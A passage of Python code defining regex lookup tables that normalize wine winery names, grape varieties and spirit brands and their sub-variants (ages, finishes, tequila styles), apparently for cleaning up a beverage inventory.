'\\bClos\\s+du\\s+Val\\b', re.IGNORECASE)), ('Colgin', re.compile(
'\\bColgin\\b', re.IGNORECASE)), ('Concha Don Melchor', re.compile(
'\\bConcha\\s.*Don\\s+Melchor\\b|Don\\s+Melchor\\b', re.IGNORECASE)), (
'Continuum', re.compile('\\bContinuum\\b', re.IGNORECASE)), ('Corison',
re.compile('\\bCorison\\b', re.IGNORECASE)), ('Cristal', re.compile(
'Roederer\\s?.*Cristal\\b|\\bCristal\\b.+Brut', re.IGNORECASE)), ('Curran',
re.compile('\\bCurran\\b', re.IGNORECASE)), ('Darioush', re.compile(
'\\bDarioush\\b', re.IGNORECASE)), ('Darioush', re.compile(
'\\bCaravan\\b', re.IGNORECASE)), ('David Arthur', re.compile(
'\\bDavid\\s+Arthur\\b', re.IGNORECASE)), ('David Bruce', re.compile(
'\\bDavid\\s+Bruce\\b', re.IGNORECASE)), ('Davis Family', re.compile(
'\\bDavis\\s+Family\\b', re.IGNORECASE)), ('Del Dotto', re.compile(
'\\bDel\\s+Dotto\\b', re.IGNORECASE)), ('Dominus', re.compile(
'\\bDominus\\b', re.IGNORECASE)), ('Goldeneye', re.compile(
'\\bGoldeneye\\b', re.IGNORECASE)), ('Paraduxx', re.compile(
'\\bParaduxx\\b', re.IGNORECASE)), ('Domaine Carneros', re.compile(
'\\bDomaine\\s+Carneros\\b', re.IGNORECASE)), ('Dominus', re.compile(
'\\Dominus\\b', re.IGNORECASE)), ('Drappier', re.compile(
'\\bDrappier\\b', re.IGNORECASE)), ('Duckhorn', re.compile(
'\\bDuckhorn\\b', re.IGNORECASE)), ('Dumol', re.compile('\\bDumol\\b',
re.IGNORECASE)), ('Dunn', re.compile('\\bDunn\\b', re.IGNORECASE)), (
'Ehlers', re.compile('\\bEhlers\\b', re.IGNORECASE)), ('Etude', re.
compile('\\bEtude\\b', re.IGNORECASE)), ('Far Niente', re.compile(
'\\bFar Niente\\b', re.IGNORECASE)), ('Flora', re.compile(
'\\bFlora\\s+Springs\\b', re.IGNORECASE)), ('Flowers', re.compile(
'\\bFlowers\\b', re.IGNORECASE)), ('Robert Foley', re.compile(
'\\bRobert\\s+\\bFoley\\b', re.IGNORECASE)), ('Foley', re.compile(
'\\bFoley\\b', re.IGNORECASE)), ('Foxen', re.compile('\\bFoxen\\b', re.
IGNORECASE)), ('Franciscan', re.compile('\\bFranciscan\\b', re.IGNORECASE)
), ('Frank Family', re.compile('\\bFrank Family\\b', re.IGNORECASE)), (
'Gary Farrell', re.compile('\\bGary\\s+Farrel+\\b', re.IGNORECASE)), (
'Ghost Block', re.compile('\\bGhost\\s+Block\\b', re.IGNORECASE)), (
'Grgich', re.compile('\\bGrgich\\b', re.IGNORECASE)), ('Groth', re.
compile('\\bGroth\\b', re.IGNORECASE)), ('Gundlach', re.compile(
'\\bGundlach\\b', re.IGNORECASE)), ('Hansel', re.compile('\\bHansel\\b',
re.IGNORECASE)), ('Hanzell', re.compile('\\bHanzell\\b', re.IGNORECASE)), (
'Hess', re.compile('\\bHess\\b', re.IGNORECASE)), ('Hewitt', re.compile
('\\bHewitt\\b', re.IGNORECASE)), ('Hobbs', re.compile(
'\\bHobbs\\b|\\bcrossbarn\\b', re.IGNORECASE)), ('Hundred Acre', re.
compile('\\bHundred\\s+Acre\\b', re.IGNORECASE)), ('Jordan', re.compile
('\\bJordan\\b', re.IGNORECASE)), ('Justin', re.compile('\\bJustin\\b',
re.IGNORECASE)), ('Kim Crawford', re.compile('\\bKim\\s+Crawford\\b',
re.IGNORECASE)), ('Kistler', re.compile('\\bKistler\\b', re.IGNORECASE)), (
'Kosta', re.compile('\\bKosta\\s+Browne?\\b', re.IGNORECASE)), ('Krug',
re.compile('\\bKrug\\b', re.IGNORECASE)), ('Kunde', re.compile(
'\\bKunde\\b', re.IGNORECASE)), ('LaCrema', re.compile(
'\\bLa\\s?Crema\\b', re.IGNORECASE)), ('Lewis', re.compile(
'\\bLewis\\b', re.IGNORECASE)), ('Lokoya', re.compile('\\bLokoya\\b',
re.IGNORECASE)), ('Meiomi', re.compile('\\bMeiomi\\b', re.IGNORECASE)), (
'Melville', re.compile('\\bMelville\\b', re.IGNORECASE)), ('Momento Mori',
re.compile('\\bMomento\\s+Mori\\b', re.IGNORECASE)), ('Mondavi', re.
compile('\\bMondavi\\b', re.IGNORECASE)), ('Montelena', re.compile(
'\\bMontelena\\b', re.IGNORECASE)), ('Mt Veeder', re.compile(
'^Mount\\s+Veeder\\b|^Mt\\.? Veeder\\b|\\d+\\s+M[^t]*t\\s+Veeder\\b',
re.IGNORECASE)), ('Newton', re.compile('\\bNewton\\b', re.IGNORECASE)), (
'Nickel', re.compile('\\bNickel\\b', re.IGNORECASE)), ('Opus One', re.
compile('\\bOpus\\s+One\\b', re.IGNORECASE)), ('P Togni', re.compile(
'\\bTogni\\b', re.IGNORECASE)), ('Pahlmeyer Jayson', re.compile(
'\\bJayson\\b', re.IGNORECASE)), ('Pahlmeyer', re.compile(
'\\bPahlmeyer\\b(?!\\s*Jay)', re.IGNORECASE)), ('Papillon', re.compile(
'\\bPapillon\\b', re.IGNORECASE)), ('Patz', re.compile('\\bPatz\\b', re
.IGNORECASE)), ('Phelps', re.compile('\\bPhelps\\b', re.IGNORECASE)), (
'Plumpjack', re.compile('\\bPlumpjack\\b', re.IGNORECASE)), ('Pride',
re.compile('\\bPride\\b', re.IGNORECASE)), ('Prisoner', re.compile(
'\\bPrisoner\\b', re.IGNORECASE)), ('Provenance', re.compile(
'\\bProvenance\\b', re.IGNORECASE)), ('R Sinskey', re.compile(
'\\bSinskey\\b', re.IGNORECASE)), ('Ramey', re.compile('\\bRamey\\b',
re.IGNORECASE)), ('Revana', re.compile('\\bRevana\\b', re.IGNORECASE)), (
'Raptor', re.compile('\\bRaptor\\s+Ridge\\b', re.IGNORECASE)), ('Revana',
re.compile('\\bRevana\\b', re.IGNORECASE)), ('Ridge', re.compile(
'\\bRidge\\b', re.IGNORECASE)), ('Robert Foley', re.compile(
'\\bRobert\\s+Foley\\b', re.IGNORECASE)), ('Rombauer', re.compile(
'\\bRombauer\\b', re.IGNORECASE)), ('Rudd', re.compile('\\bRudd\\b', re
.IGNORECASE)), ('Scarecrow', re.compile('\\bScarecrow\\b', re.IGNORECASE)
), ('Sea Smoke', re.compile('\\bSea\\s+Smoke\\b', re.IGNORECASE)), (
'Seghesio', re.compile('\\bSeghesio\\b', re.IGNORECASE)), ('Shafer', re
.compile('\\bShafer\\b', re.IGNORECASE)), ('Sherwin', re.compile(
'\\bSherwin\\b', re.IGNORECASE)), ('Silver Oak', re.compile(
'\\bSilver\\s+Oak\\b', re.IGNORECASE)), ('Silverado', re.compile(
'\\bSilverado\\b', re.IGNORECASE)), ('Simi', re.compile('\\bSimi\\b',
re.IGNORECASE)), ('Sonoma Cutrer', re.compile('\\bCutrer\\b', re.
IGNORECASE)), ('Spottswoode', re.compile('\\bSpottswoode\\b', re.
IGNORECASE)), ('Stag Leap', re.compile('\\bStag.*\\sLeap\\b', re.
IGNORECASE)), ('Sullivan', re.compile('\\bSullivan\\b', re.IGNORECASE)), (
'Summerland', re.compile('\\bSummerland\\b', re.IGNORECASE)), ('Summers',
re.compile('\\bSummers\\b', re.IGNORECASE)), ('Tantara', re.compile(
'\\bTantara\\b', re.IGNORECASE)), ('Turnbull', re.compile(
'\\bTurnbull\\b', re.IGNORECASE)), ('Veuve', re.compile('\\bVeuve\\b',
re.IGNORECASE)), ('Viader', re.compile('\\bViader\\b', re.IGNORECASE)), (
'Waterstone', re.compile('\\bWaterstone\\b', re.IGNORECASE)), ('Whitehall',
re.compile('\\bWhitehall\\b', re.IGNORECASE)), ('Wm Selyem', re.compile
('\\bWilliams\\s*\\-?Selyem\\b', re.IGNORECASE)), ('ZD', re.compile(
'\\bZD\\b', re.IGNORECASE)), ('Zaca', re.compile('\\bZaca\\b', re.
IGNORECASE)), ('zBourbon Woodford Res', re.compile(
'\\bWoodford\\s+Reserve\\b', re.IGNORECASE)), ('zBourbon Woodford Res',
re.compile('\\bWoodford\\s+Rsv\\b', re.IGNORECASE)), ('zCognac Courvoisier'
, re.compile('\\bCourvoisier\\b', re.IGNORECASE)), ('zCognac Hennessy',
re.compile('\\bHennesse?y\\b', re.IGNORECASE)), ('zCognac Remy', re.
compile('\\bRemy\\s+Martin\\b|\\bRemy\\s+Louis', re.IGNORECASE)), (
'zCointreau', re.compile('\\bCointreau\\b', re.IGNORECASE)), (
'zGin Hendrick', re.compile('\\bHendrick', re.IGNORECASE)), (
'zGin Tanqueray', re.compile('\\bTanqueray\\b', re.IGNORECASE)), (
'zRum Mt Gay', re.compile('\\bMount\\s+Gay\\b|\\bMt\\s+Gay', re.IGNORECASE)
), ('zRum Ron Zacapa', re.compile('\\bRon\\s+Zacapa\\b', re.IGNORECASE)), (
'zRye Hayden', re.compile('\\bBasil\\s+Hayden\\b', re.IGNORECASE)), (
'zSambuca', re.compile('\\bSambuca\\b', re.IGNORECASE)), (
'zScotch Glenmorangie', re.compile('\\bGlenmorangie\\b', re.IGNORECASE)), (
'zScotch Hibiki Harmony', re.compile('\\bHibiki\\s.*Harmony\\b', re.
IGNORECASE)), ('zScotch Hibiki', re.compile('\\bHibiki\\b(?!\\s*Har)',
re.IGNORECASE)), ('zScotch Macallan', re.compile('\\bMacallan\\b', re.
IGNORECASE)), ('zTeq Campo Azul', re.compile('\\bCampo\\s+Azul\\b', re.
IGNORECASE)), ('zTeq Casamigos', re.compile('\\bCasamigos\\b', re.
IGNORECASE)), ('zTeq Casino Azul', re.compile('\\bCasino\\s+Azul\\b',
re.IGNORECASE)), ('zTeq Clase Azul', re.compile('\\bClase\\s+Azul\\b',
re.IGNORECASE)), ('zTeq Cuervo', re.compile(
'\\bJose\\s+Cuervo\\b|^Cuervo\\b', re.IGNORECASE)), ('zTeq Don Julio',
re.compile('\\bDon\\s+Julio\\b', re.IGNORECASE)), ('zTeq Dos Artes', re
.compile('\\bDos\\s+Artes\\b|^Cuervo\\b', re.IGNORECASE)), (
'zTeq Gran Cava', re.compile('\\bGran\\s+Cava\\b', re.IGNORECASE)), (
'zTeq Herradura', re.compile('\\bHerradura\\b', re.IGNORECASE)), (
'zTeq Loma Azul', re.compile('\\bLoma\\s+Azul\\b', re.IGNORECASE)), (
'zTeq Padre Azul', re.compile('\\bPadre\\s+Azul\\b', re.IGNORECASE)), (
'zTeq Partida', re.compile('\\bPartida\\b', re.IGNORECASE)), ('zTeq Patron'
, re.compile('\\bPatron\\b', re.IGNORECASE)), ('zTripleSec Gr Marnier',
re.compile('\\bGrand\\s+Marnier\\b', re.IGNORECASE)), (
'zTripleSec Dekuyper', re.compile('\\bDekuyper\\b', re.IGNORECASE)), (
'zTripleSec Hiram', re.compile('\\bHiram\\b', re.IGNORECASE)), (
'zVodka Absolut', re.compile('\\bAbsolut\\b', re.IGNORECASE)), (
'zVodka Skyy', re.compile('\\bSkyy\\b', re.IGNORECASE)), ('zVodka Tito',
re.compile('\\bTito', re.IGNORECASE)), ('zWhiskey Balvenie', re.compile
('\\bBalvenie\\b', re.IGNORECASE)), ('zWhiskey J Walker', re.compile(
'\\bJohn+ie\\s+Walker\\b', re.IGNORECASE))
grapeLookup = ('Cab Franc', re.compile(
'\\bCabernet\\s+Franc|\\bCab\\s+Franc', re.IGNORECASE)), ('Cab', re.
compile('\\bCabernet\\b|\\sCS\\s|\\sCS$|\\bCab\\b', re.IGNORECASE)), (
'Claret', re.compile('\\bClaret\\b', re.IGNORECASE)), ('Rose Pinot', re
.compile('\\bRose\\b.*\\bPinot\\b|\\bPinot\\b.*\\bRose\\b', re.IGNORECASE)
), ('Pinot', re.compile('\\bPinot\\b|\\bPN\\b|\\bP\\s+Noir\\b', re.
IGNORECASE)), ('Merlot', re.compile('\\bMerlot\\b|\\bME\\b', re.IGNORECASE)
), ('Sauv Blanc', re.compile('\\bSauvignon\\s+Blanc\\b|\\bSB\\b', re.
IGNORECASE)), ('Sauv Blanc', re.compile(
'\\bSauvignon\\/Fume\\s+Blanc\\b', re.IGNORECASE)), ('Meritage', re.
compile('\\bMeritage\\b', re.IGNORECASE)), ('Fume', re.compile(
'\\bFume\\b|\\bFumé', re.IGNORECASE)), ('Champagne', re.compile(
'\\bChampagne\\b', re.IGNORECASE)), ('Chard', re.compile(
'\\bChar+d|\\bCH\\b', re.IGNORECASE)), ('Shiraz', re.compile(
'\\bShiraz\\b', re.IGNORECASE)), ('Syrah', re.compile(
'\\bSyrah\\b|\\bSY\\b', re.IGNORECASE)), ('Zin', re.compile(
'\\bZinfandel\\b|\\bZIN\\b|\\bZN\\b', re.IGNORECASE)), ('Rose', re.
compile('\\bRose\\b|\\bRosé', re.IGNORECASE)), ('Sangiovese', re.
compile('\\Sangiovese\\b', re.IGNORECASE)), ('Gewurzt', re.compile(
'\\bGew.rztraminer\\b|\\bGewürzt', re.IGNORECASE)), ('Malbec', re.
compile('\\bMalbec\\b', re.IGNORECASE)), ('Viognier', re.compile(
'\\bViognier\\b', re.IGNORECASE)), ('Roussanne', re.compile(
'\\bRoussanne\\b', re.IGNORECASE)), ('Charbono', re.compile(
'\\bCharbono\\b', re.IGNORECASE)), ('PSirah', re.compile(
'\\bPetite Sirah\\b', re.IGNORECASE)), ('Cuvee', re.compile(
'\\bCuvee\\b', re.IGNORECASE)), ('Red', re.compile(
'\\bRed\\b|\\bBordeaux\\s+Blend\\b', re.IGNORECASE)), ('Syrah-Cab', re.
compile('\\bSyrcab\\b|\\bsyrah[-\\s\\/]+cab', re.IGNORECASE)), ('Grenache',
re.compile('\\bGrenache\\b', re.IGNORECASE)), ('Tempranillo', re.
compile('\\bTempranillo\\b', re.IGNORECASE))
ignoreGrapeLookup = {'Cristal': ['Rose', None], 'Domaine Carneros': ['Brut',
None], 'Dominus': [None], 'Papillon': None, 'Paraduxx': None, 'Veuve':
None, 'zCointreau': None, 'zGin Hendrick': None, 'zGin Tanqueray': [
'Ten', None], 'zTripleSec Gr Marnier': ['1880', '100th', 'Cent', 'Quin',
None], 'zTripleSec Dekuyper': None, 'zTripleSec Hiram': None,
'zVodka Skyy': ['Citrus', None], 'zVodka Tito': None}
noGrapeLookup = {'Ehlers': ['120-80'], 'Alban': ['Pandora'], 'BV': [
'Tapestry', 'Latour'], 'Bennett Ln': ['Maximus'], 'Bremer': [
'Austintatious'], 'Cain Five': None, 'Colgin': ['Cariad', 'IX'],
'Concha Don Melchor': None, 'Continuum': None, 'Darioush': ['Duel',
'Darius'], 'Duckhorn': ['Discussion'], 'Far Niente': ['Dolce'], 'Flora':
['Trilogy'], 'Franciscan': ['Magnificat'], 'Grgich': ['Violetta'],
'Gundlach': ['Vintage Reserve'], 'Justin': ['Isosceles'], 'Krug': [
'Generations'], 'Mondavi': ['Maestro'], 'Newton': ['Puzzle'],
'Opus One': None, 'Phelps': ['Insignia'], 'Prisoner': ['Cuttings',
'Derange', 'Saldo', 'Blindfold'], 'Ridge': ['Monte Bello'],
'Robert Foley': ['Griffin'], 'Sullivan': ['Coeur de Vigne'], 'Zaca': [
'ZThree', 'ZCuvee'], 'zCognac Courvoisier': ['Napolean', 'VS', 'VSOP',
'XO'], 'zCognac Hennessy': ['Paradis', 'Richard', 'VS', 'VSOP', 'XO',
'Master'], 'zCognac Remy': ['1738', 'Louis XIII', 'VSOP', 'XO', 'VS'],
'zRum Ron Zacapa': ['23', 'Negra', 'XO'], 'zRye Hayden': ['Dark',
'Caribbean'], 'zScotch Hibiki Harmony': None, 'zTeq Campo Azul': [
'Extra Anejo', 'Anejo', 'Blanco', 'Reposado'], 'zTeq Casamigos': [
'Extra Anejo', 'Anejo', 'Blanco', 'Reposado'], 'zTeq Casino Azul': [
'Extra Anejo', 'Anejo', 'Blanco', 'Reposado', 'Silver'],
'zTeq Clase Azul': ['Ultra', 'Extra Anejo', 'Anejo', 'Blanco',
'Reposado', 'Mezcal', 'Plata', 'Platino'], 'zTeq Dos Artes': [
'Extra Anejo'], 'zTeq Gran Cava': ['Extra Anejo'], 'zTeq Loma Azul': [
'Extra Anejo', 'Anejo', 'Blanco', 'Reposado'], 'zTeq Partida': [
'Blanco', 'Elegante'], 'zVodka Absolut': ['Citron', 'Mandarin',
'Mandrin', 'Mango', 'Ruby', 'Vanilia', 'Raspberri', 'Grapevine', None],
'zWhiskey J Walker': ['Double Black', 'Black', 'Blue', 'Gold', 'Green',
'Platinum', 'Red', 'Swing', 'White', '18', '21']}
liquorLookup = {'zRum Mt Gay': [('1703 Mst', re.compile('\\b1703\\b', re.
IGNORECASE)), ('BB', re.compile('\\bBlack Barrel\\b', re.IGNORECASE)),
('Eclipse Silver', re.compile('\\bEclipse\\s+Silver\\b', re.IGNORECASE)
), ('Eclipse', re.compile('\\bEclipse\\b', re.IGNORECASE)), ('Old Peat',
re.compile('\\bOld Peat', re.IGNORECASE)), ('Old Pot', re.compile(
'\\bPot\\s+Still\\b', re.IGNORECASE)), ('Old', re.compile('\\bOld\\b',
re.IGNORECASE)), ('Silver', re.compile('\\bSilver\\b', re.IGNORECASE)),
('XO Peat', re.compile('\\bXO\\b', re.IGNORECASE))],
'zScotch Glenmorangie': [('10', re.compile('\\b10(YR)?\\b', re.
IGNORECASE)), ('14 Port', re.compile(
'14.+\\bQuinta\\b|14.+\\bPort\\b|\\bQuinta\\b.+14|\\bPort\\b.+14', re.
IGNORECASE)), ('12 Bacalta', re.compile('\\bBacalta\\b', re.IGNORECASE)
), ('12 Burgundy', re.compile('\\bBurgundy\\b', re.IGNORECASE)), (
'12 Nectar', re.compile('\\bNectar\\b', re.IGNORECASE)), ('12 Port', re
.compile('\\bQuinta\\b|\\bPort\\b', re.IGNORECASE)), ('12 Sherry', re.
compile('\\bLa\\s?Santa\\b|\\bSherry\\b', re.IGNORECASE)), ('12 Signet',
re.compile('\\bSignet\\b', re.IGNORECASE)), ('15 Cadboll', re.compile(
'\\bCadboll', re.IGNORECASE)), ('15', re.compile('\\b15(YR)?\\b', re.
IGNORECASE)), ('18', re.compile('\\b18(YR)?\\b|\\b18YEAR\\b', re.
IGNORECASE)), ('25 Astar', re.compile('\\bAstar\\b', re.IGNORECASE)), (
'25', re.compile('\\b25(YR)?\\b', re.IGNORECASE)), ('Companta', re.
compile('\\bCompanta\\b', re.IGNORECASE)), ('Finealta', re.compile(
'\\bFinealta\\b', re.IGNORECASE)), ('Milsean', re.compile(
'\\bMilsean\\b', re.IGNORECASE)), ('Sonnalta', re.compile(
'\\bSonnalta\\b', re.IGNORECASE))], 'zScotch Macallan': [('10 Fine', re
.compile('\\bFine.*\\b10\\b|\\b10.*Fine')), ('10', re.compile(
'\\b10\\b')), ('12 Double Gold', re.compile(
'\\bDbl\\b.*Gold|\\bDouble\\b.*Gold', re.IGNORECASE)), ('12 Double', re
.compile('\\bDouble\\s.*12(YR)?\\b', re.IGNORECASE)), ('12 Double', re.
compile('\\b12\\s.*Double\\b', re.IGNORECASE)), ('12 Double', re.
compile('\\bDbl\\b|\\bDouble\\b', re.IGNORECASE)), ('12 Edition 1', re.
compile('\\bEdition\\s.*1\\b', re.IGNORECASE)), ('12 Edition 2', re.
compile('\\bEdition\\s.*2\\b', re.IGNORECASE)), ('12 Edition 3', re.
compile('\\bEdition\\s.*3\\b', re.IGNORECASE)), ('12 Edition 4', re.
compile('\\bEdition\\s.*4\\b', re.IGNORECASE)), ('12 Sherry', re.
compile('\\b12\\s.*Sherry\\b|\\bSherry\\b\\s.*\\b12', re.IGNORECASE)),
('12 Triple', re.compile('\\b12(YR)?\\s.*Triple\\b', re.IGNORECASE)), (
'12 Triple', re.compile('\\bTriple\\s.*12\\b', re.IGNORECASE)), ('12',
re.compile('\\b12(YR)?\\b', re.IGNORECASE)), ('15 Triple', re.compile(
'\\b15(YR)?\\s.*Triple\\b|Triple.+\\b15(YR)?\\b', re.IGNORECASE)), (
'15 Fine', re.compile('\\b15(YR)?\\b.*\\bFine\\b', re.IGNORECASE)), (
'15', re.compile('\\b15(YR)?\\b', re.IGNORECASE)), ('17 Sherry', re.
compile('\\b17(YR)?\\s.*Sherry\\b', re.IGNORECASE)), ('17 Fine', re.
compile('\\b17(YR)?\\b.*\\bFine\\b', re.IGNORECASE)), ('17', re.compile
('\\b17(YR)?\\b', re.IGNORECASE)), ('18 Sherry', re.compile(
'\\b18(YR)?\\s.*Sherry\\b|Sherry\\b.*18', re.IGNORECASE)), ('18 Triple',
re.compile('\\b18(YR)?\\s.*Triple\\b|Triple.+\\b18(YR)?\\b', re.
IGNORECASE)), ('18 Fine', re.compile('\\b18(YR)?\\b.*\\bFine\\b', re.
IGNORECASE)), ('18 Gran', re.compile('Gran\\b.*\\b18', re.IGNORECASE)),
('18', re.compile('\\b18(YR)?\\b', re.IGNORECASE)), ('21 Fine', re.
compile('\\b21.*Fine\\b', re.IGNORECASE)), ('21', re.compile(
'\\b21(YR)?\\b', re.IGNORECASE)), ('25 Sherry', re.compile(
'\\b25\\s.*Sherry\\b', re.IGNORECASE)), ('25', re.compile(
'\\b25(YR)?\\b')), ('30 Sherry', re.compile('\\b30\\s.*Sherry', re.
IGNORECASE)), ('30 Triple', re.compile(
'\\b30(YR)?\\s.*Triple\\b|Triple.+\\b30(YR)?\\b', re.IGNORECASE)), (
'30 Fine', re.compile('\\b30(YR)?\\b.*\\bFine\\b|Fine.*30', re.
IGNORECASE)), ('30', re.compile('\\b30(YR)?\\b')), ('Rare', re.compile(
'\\bRare\\b', re.IGNORECASE))], 'zTeq Cuervo': [('Especial Gold', re.
compile('\\bEspecial\\b.*Gold\\b|Gold.*Especial', re.IGNORECASE)), (
'Especial Blue', re.compile('\\bEspecial\\b.*Blue\\b', re.IGNORECASE)),
('Especial', re.compile('\\bEspecial\\b', re.IGNORECASE)), (
'Familia Platino', re.compile('\\bPlatino\\b', re.IGNORECASE)), (
'Familia Anejo', re.compile('\\bFamilia\\b|\\bReserva\\b', re.
IGNORECASE)), ('Gold', re.compile('\\bGold\\b', re.IGNORECASE)), (
'Reposado Lagavulin', re.compile('\\bReposado.*Lagavulin', re.
IGNORECASE)), ('Tradicional Anejo', re.compile(
'Tradicional.*Anejo|Anejo.*Tradicional', re.IGNORECASE)), (
'Tradicional Reposado', re.compile(
'Tradicional.*Reposado|Reposado.*Tradicional', re.IGNORECASE)), (
'Tradicional Silver', re.compile('\\bTradicional\\b', re.IGNORECASE)),
('Tradicional Silver', re.compile('\\bTraditional\\b', re.IGNORECASE)),
('Reposado', re.compile('\\bReposado\\b', re.IGNORECASE)), ('Silver',
re.compile('\\bSilver\\b', re.IGNORECASE))], 'zTeq Don Julio': [('1942',
re.compile('\\b1942\\b', re.IGNORECASE)), ('Real', re.compile(
'\\bReal\\b', re.IGNORECASE)), ('Anejo Claro 70th', re.compile(
'\\b70th\\b', re.IGNORECASE)), ('Anejo Claro', re.compile(
'\\bAnejo\\b\\s*Claro\\b', re.IGNORECASE)), ('Anejo', re.compile(
'\\bAnejo\\b', re.IGNORECASE)), ('Blanco', re.compile('\\bBlanco\\b',
re.IGNORECASE)), ('Reposado Lagavulin', re.compile(
'\\bRepo.+Lagvulin\\b', re.IGNORECASE)), ('Reposado Dbl', re.compile(
'\\bReposado.+Double\\b', re.IGNORECASE)), ('Reposado Dbl', re.compile(
'\\bReposado.+Dbl\\b', re.IGNORECASE)), ('Reposado Dbl', re.compile(
'\\bDouble.+Reposado\\b', re.IGNORECASE)), ('Reposado Private', re.
compile('\\bReposado.+Private\\b', re.IGNORECASE)), ('Reposado', re.
compile('\\bReposado\\b', re.IGNORECASE)), ('Silver', re.compile(
'\\bSilver\\b', re.IGNORECASE))], 'zTeq Herradura': [('Ultra', re.
compile('\\bUltra\\b', re.IGNORECASE)), ('Suprema', re.compile(
'\\bSuprema\\b', re.IGNORECASE)), ('Anejo', re.compile('\\bAnejo\\b',
re.IGNORECASE)), ('Blanco', re.compile('\\bBlanco\\b', re.IGNORECASE)),
('Reposado Gold', re.compile(
'\\bReposado\\s+Gold\\b|\\bGold\\s+Reposado\\b', re.IGNORECASE)), (
'Reposado Scotch', re.compile(
'\\bReposado.+Scotch\\b|\\bScotch.+Reposado\\b', re.IGNORECASE)), (
'Reposado Port', re.compile('\\bPort.+Reposado\\b|\\bReposado.+Port\\b',
re.IGNORECASE)), ('Reposado', re.compile('\\bReposado\\b', re.
IGNORECASE)), ('Silver', re.compile('\\bSilver\\b', re.IGNORECASE))],
'zTeq Patron': [('Gran Piedra', re.compile('\\bPiedra\\b', re.
IGNORECASE)), ('DELETE Roca DELETE', re.compile('\\bRoca\\b', re.
IGNORECASE)), ('Anejo Extra Lalique', re.compile('\\bLalique\\b', re.
IGNORECASE)), ('Anejo Extra 7yr', re.compile(
'\\b7YR\\b|\\b7 anos\\b|\\b7 year\\b', re.IGNORECASE)), (
'Anejo Extra 5yr', re.compile('\\b5YR\\b|\\b5 anos\\b|\\b5 year\\b', re
.IGNORECASE)), ('Anejo Extra 10yr', re.compile(
'\\b10\\b.+\\bExtra\\b|\\bExtra\\b.+10', re.IGNORECASE)), (
'Anejo Extra', re.compile('\\bExtra\\s+Anejo\\b', re.IGNORECASE)), (
'Gran Anejo', re.compile('\\bGran\\s+Anejo\\b', re.IGNORECASE)), (
'Gran Anejo', re.compile('\\bBurdeos\\b', re.IGNORECASE)), (
'Gran Smoky', re.compile('\\bGran\\s+.*Smoky\\b', re.IGNORECASE)), (
'Anejo', re.compile('\\bAnejo\\b', re.IGNORECASE)), ('Gran Platinum',
re.compile('\\bPlatinum\\b', re.IGNORECASE)), ('Reposado', re.compile(
'\\bReposado\\b', re.IGNORECASE)), ('Silver LTD', re.compile(
'\\bSilver.*Limited\\b|\\bLimited.*Silver\\b', re.IGNORECASE)), (
'Silver Estate', re.compile('\\bEstate.*Silver\\b|\\bSilver.*Estate\\b',
re.IGNORECASE)), ('Silver', re.compile('\\bSilver\\b', re.IGNORECASE)),
('Blanco', re.compile('\\bBlanco\\b', re.IGNORECASE))],
'zTeq Padre Azul': [('Blanco', re.compile('\\bsilver\\b', re.IGNORECASE
))], 'zWhiskey Balvenie': [('12 Double', re.compile(
'\\bDouble.*12(YR)?\\b', re.IGNORECASE)), ('12 Double', re.compile(
'\\b12(YR)?\\s.*Double', re.IGNORECASE)), ('12 First', re.compile(
'\\b12(YR)?\\s.*First', re.IGNORECASE)), ('12 USA', re.compile(
'\\b12.*American|American.*12', re.IGNORECASE)), ('12 Toast', re.
compile('\\b12(YR)?\\s.*Toast', re.IGNORECASE)), ('12', re.compile(
'\\b12(YR)?\\b', re.IGNORECASE)), ('14 Carib', re.compile(
'\\b14(YR)?\\s.*Carib', re.IGNORECASE)), ('14 Carib', re.compile(
'\\b14(YR)?\\s.*CB\\s+Cask', re.IGNORECASE)), ('14 Carib', re.compile(
'\\bCarr?ib', re.IGNORECASE)), ('14 Peat', re.compile(
'\\b14(YR)?\\s.*Peat', re.IGNORECASE)), ('15 Sherry', re.compile(
'\\b15(YR)?\\s.*Sherry\\b', re.IGNORECASE)), ('15 Sherry', re.compile(
'\\bSherry\\s+.*15(YR)?\\b', re.IGNORECASE)), ('15', re.compile(
'\\b15(YR)?\\b', re.IGNORECASE)), ('16 Triple', re.compile(
'\\b16(YR)?\\s.*Triple\\b', re.IGNORECASE)), ('17 Sherry Double', re.
compile('\\b17(YR)?\\s.*Sherry\\s+Doub', re.IGNORECASE)), ('17 Sherry',
re.compile('\\b17(YR)?\\s.*Sherry', re.IGNORECASE)), ('17 Double', re.
compile('\\b17(YR)?\\s.*Double', re.IGNORECASE)), ('17 Double', re.
compile('\\bDouble.*17(YR)?\\b', re.IGNORECASE)), ('17 Peat', re.
compile('\\b17(YR)?\\s.*Peat', re.IGNORECASE)), ('17 Peat', re.compile(
'\\bPeat.*17(YR)?\\b', re.IGNORECASE)), ('17', re.compile(
'\\b17(YR)?\\b', re.IGNORECASE)), ('21 Port', re.compile('\\b21.*Port',
re.IGNORECASE)), ('21 Port', re.compile('\\bPort.*21\\b', re.IGNORECASE
)), ('21', re.compile('21', re.IGNORECASE)), ('25', re.compile(
'\\b25(YR)?\\b', re.IGNORECASE)), ('30', re.compile('\\b30(YR)?\\b', re
.IGNORECASE)), ('40', re.compile('\\b40(YR)?\\b', re.IGNORECASE))],
'zBourbon Woodford Res': [('Dbl', re.compile('\\bDouble\\b', re.
IGNORECASE)), ('Derby', re.compile('\\bDerby\\b', re.IGNORECASE)), (
'Rye Choc', re.compile('\\bChocolate.*Rye\\b', re.IGNORECASE)), ('Rye',
re.compile('\\bRye\\b', re.IGNORECASE)), ('Brandy', re.compile(
'\\bBrandy\\b', re.IGNORECASE)), ('Batch', re.compile('\\bBatch\\b', re
.IGNORECASE)), ('Barrel', re.compile('\\bBarrel\\b', re.IGNORECASE)), (
'Master', re.compile('\\bMasters?\\b', re.IGNORECASE)), ('Malt', re.
compile('\\bMalt\\b', re.IGNORECASE)), ('Maple', re.compile(
'\\bMaple\\b', re.IGNORECASE)), ('Wheat', re.compile('\\bWheat\\b', re.
IGNORECASE)), ('', re.compile('\\bWoodford\\b', re.IGNORECASE))],
'zSambuca': [('Romana Black', re.compile(
'\\bRomana.*\\bBlack\\b|\\bBlack\\s+Romana\\b', re.IGNORECASE)), (
'Romana', re.compile('\\bRomana\\b', re.IGNORECASE)), ('Di Amore', re.
compile('\\bdi Amore\\b', re.IGNORECASE))], 'zScotch Hibiki': [('12',
re.compile('\\b12\\s*YE?A?R\\b', re.IGNORECASE)), ('17 Limited', re.
compile('\\b17\\s*YE?A?R\\b.+Limited', re.IGNORECASE)), ('17', re.
compile('\\b17\\s*YE?A?R\\b', re.IGNORECASE)), ('21 Limited', re.
compile('\\b21\\s*YE?A?R\\b.+Limited', re.IGNORECASE)), ('21', re.
